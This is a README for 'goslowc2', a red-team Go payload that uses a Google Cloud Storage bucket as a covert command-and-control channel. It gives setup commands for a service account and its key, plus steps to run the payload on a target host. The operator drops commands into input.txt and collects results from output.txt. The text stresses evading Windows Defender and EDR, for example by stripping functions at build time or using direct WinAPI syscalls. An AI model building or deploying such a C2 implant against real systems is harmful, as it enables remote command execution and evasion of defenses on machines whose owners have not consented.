A demonstration of using GoLang and GCP Storage for a quick and easy evasion payload.
For a walkthrough of using this solution. Please visit the accompanying post: Red Team Payload with Go and GCP
- Found GoLang is not as widely supported for reverse engineering tools without plugins or some tuning which also infers that EDR platforms haven't caught up as much either
- GoLang allows the advantage memory handling and type handling of scripting language but the performance of a compiled language because you can 'go build foo.go' something
- Google Cloud Platform (GCP) Storage SDK automatically allows for authentication TLS v1.2 secure endpoints and a scratch pad for input and output for easy asynchronous communication
- Running GoLang os.exec and the syscall.call methods to unsafe (non type casted) unsigned integer pointers C style for interesting Windows 10/11 Q4 2022 Defender default 'evasion' shell or additional payload routines vs. the C running the system method that immediately triggers a backdoor alert and cloud scan
- General grudge: Google SOC sent me a nasty gram about my C payload stored in my personal Google Drive account. GoLang was made by Google Developers. I wanted to make it ironic because this would have been so much easier using a packer + python3.
- Maybe you don't have access to the standard MSF multi/handler in a pen test?
This module is to demonstrate using os.exec to wrap and execute another Go script or binary as a subprocess which easily can trigger an IOC but also allows for easy ingestion (with some modification) of running input.txt with straight GoLang WinAPI sys calls for future "evasion" considerations. I also included notes about some strange behaviors found when using user32.dll MessageBoxA.
go mod init goslowc2/main
go get cloud.google.com/storage
go build goslowc2
gsutil mb gs://BUCKET_NAME
gcloud iam service-accounts create SA_NAME \
--description="DESCRIPTION" \
--display-name="DISPLAY_NAME"
gcloud projects add-iam-policy-binding PROJECT_ID \
--member="serviceAccount:SA_NAME@PROJECT_ID.iam.gserviceaccount.com" \
--role="ROLE_NAME"
For CLI need to create YAML for the permissions to bind to a role
title: goslow-role
description: foo
stage: GA
includedPermissions:
- storage.objects.create
- storage.objects.get
Create the role at the project level
gcloud iam roles create role-id --project=project-id \
--file=yaml-file-path
Bind the role to the service account
gcloud iam service-accounts add-iam-policy-binding \ SA_NAME@PROJECT_ID.iam.gserviceaccount.com \ --member="user:USER_EMAIL" \ --role="roles/iam.serviceAccountUser"
Grab a JSON key to download and run in the same directory as goslowc2
gcloud iam service-accounts keys create KEY_FILE \
--iam-account=SA_NAME@PROJECT_ID.iam.gserviceaccount.com
- Create a input.txt in the root namespace of your bucket with a single command syntax such as "whoami" or "dir"
- Run goslowc2.exe on targethost
- Wait for the output.txt to show up in your bucket in the same root namespace
- gsutil cp gs://YOURBUCKET/*.txt ./
- cat ./output.txt
- echo "whoami" > input.txt
- gsutil cp ./input.txt gs://YOURBUCKET
IMPORTANT: Be sure to modify any variables in the code before building as the initial values are for demo purposes only
cp <yourserviceaccountkey.json> ./
go build goslowc2.go
goslowc2.exe #this is going to be your payload running on target host
DISCLAIMER: The author is NOT responsible for misuse or abuse of this educational source // goslowc2 is a demo payload execution for using GCP Storage bucket and objects as the C2 mechanism the time of development Q4 2022 windows defender did not trigger the OS.exec method unless functions were stripped at build time
// For stealthier payload consider using my complement consider using direct WinAPI syscalls converting to unsigned integer pointers
// Author: Dennis Chow dchow[AT]xtecsystems.com 11/20/2022
// Requirements: GCP storage bucket and service account credential foo.json in the same runtime directory
// Confirmed working on GoLang 1.18.4 and GCP Storage SDK 1.28.0